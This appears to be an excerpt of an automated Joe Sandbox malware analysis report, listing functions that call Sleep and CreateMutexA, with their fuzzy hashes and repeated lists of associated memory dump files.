Opcode Fuzzy Hash: 6ef2f37b3d2276d5d24629d80f558ae9d38467e2a36bb059c7b1d683b359dde6
Instruction Fuzzy Hash: 5F317731B042049BEB18DB78DC997ADB772EBC6320F208218E454E72D6D77989C0B752

Function 00F0A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b7e29345db7d7ce709ade13da3388cf2e90406c8a8c73246cb8e4564f669cdb8
Instruction ID: ccfa73a1ade954f95094f3dbefdc90a729e88910c948f41bf949c3a887c87cd6
Opcode Fuzzy Hash: b7e29345db7d7ce709ade13da3388cf2e90406c8a8c73246cb8e4564f669cdb8
Instruction Fuzzy Hash: AD314431B003049BEB18DB78DD89BADB772DB92320F208218E414973D1C77A99C0BB52

Function 00F0A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f8a332daab554e633fbfb5899d8c973d41a5385a2ddac5352d6e49d18e3a363c
Instruction ID: aedad0f56dc82e5938eaac824b67df6de6e3c2a988db71215c561515970ef677
Opcode Fuzzy Hash: f8a332daab554e633fbfb5899d8c973d41a5385a2ddac5352d6e49d18e3a363c
Instruction Fuzzy Hash: D6314831B003049BEB18DB78DD89BADB772EBD6320F248218E454972D1D77689C0B752

Function 00F0A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c835a01b7706d065a9f5532b6702b995e70102d85e3cf81f7efe3bcfec57cb2f
Instruction ID: bd76f013a2422b722ea412efa134755e4093f644ad05f82698c61e784513aae6
Opcode Fuzzy Hash: c835a01b7706d065a9f5532b6702b995e70102d85e3cf81f7efe3bcfec57cb2f
Instruction Fuzzy Hash: FB310731B003049BEB18DBB8DD8DBADB672EFD5320F248218E4549B2D5D7B989C0B756

Function 00F0A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696486424.0000000001182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696672773.0000000001184000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696711179.0000000001187000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696758341.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697022753.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697171716.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697555659.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697597915.00000000011FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697614449.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697629483.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697644510.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697658599.0000000001206000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697712710.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697821760.0000000001217000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 361d916a99408a6776015990a98920b5d9aede3934aa286329192bc1cdf2bf97
Instruction ID: 618b5629a406c1ddd1e966b7222384c2596663b4ab22625abb8c5a4268ff5da0
Opcode Fuzzy Hash: 361d916a99408a6776015990a98920b5d9aede3934aa286329192bc1cdf2bf97
Instruction Fuzzy Hash: 86311631B002049BEB18DB78DC99BADB772EBC5324F288618E454DB2D5D7798980B716

Function 00F0A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F0A963
CreateMutexA.KERNEL32(00000000,00000000,00F63254), ref: 00F0A981

Memory Dump Source

Source File: 00000000.00000002.1695364791.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1695326921.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695364791.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695422177.0000000000F69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695438074.0000000000F6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695452967.0000000000F77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695639337.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695661137.00000000010D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695710065.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695801495.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695826855.00000000010F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695883229.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695897796.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695914999.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695933011.00000000010FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695947507.0000000001105000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695961739.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695974868.0000000001107000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695987521.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696004687.0000000001122000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696017740.0000000001124000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696031819.0000000001126000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696044481.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696058378.000000000112F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696071818.0000000001134000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696084623.0000000001135000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696100276.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696117074.000000000114E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696132441.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696145123.0000000001152000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696161182.0000000001156000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696174598.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696188767.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696207267.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696286023.0000000001168000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696387027.0000000001170000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696401831.0000000001172000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696472516.0000000001181000.00000080.00000001.01000000.00000003.sdmpDownload File
